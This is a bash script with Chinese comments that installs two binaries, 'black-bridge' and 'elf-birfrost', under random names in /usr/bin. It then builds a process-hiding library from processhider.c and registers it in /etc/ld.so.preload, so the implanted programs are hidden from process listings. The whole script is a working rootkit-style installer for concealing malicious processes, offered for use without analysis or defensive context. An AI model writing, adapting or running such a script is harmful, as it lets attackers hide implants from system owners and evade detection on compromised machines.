#!/bin/bash
blackbridge_random=`cat /dev/urandom | tr -dc a-z0-3 | head -c 5`
birfrost_random=`cat /dev/urandom | tr -dc a-z0-3 | head -c 5`
filetype=`cat /dev/urandom | tr -dc a-z | head -c 3`

#生成随机文件名的配置文件
echo 'blackbridge='"$blackbridge_random"'.'"$filetype" >> /config
echo 'birfrost='"$birfrost_random"'.'"$filetype" >> /config

#导入环境变量
source /config

#开始更名
mv black-bridge /usr/bin/"$blackbridge" && chmod +x /usr/bin/"$blackbridge"
mv elf-birfrost /usr/bin/"$birfrost" && chmod +x /usr/bin/"$birfrost"

#开始制作Hider
mkdir /Hider && chmod 0777 -R /Hider
unzip hide.zip
sed -i "s/black-bridge/$blackbridge/g" `grep "black-bridge" -rl "processhider.c"` && make
mv libprocesshider.so /Hider/"$blackbridge"'.so'
echo /Hider/"$blackbridge"'.so' >> /etc/ld.so.preload

sed -i "s/$blackbridge/$birfrost/g" `grep "$blackbridge" -rl "processhider.c"` && make
mv libprocesshider.so /Hider/"$birfrost"'.so'
echo /Hider/"$birfrost"'.so' >> /etc/ld.so.preload
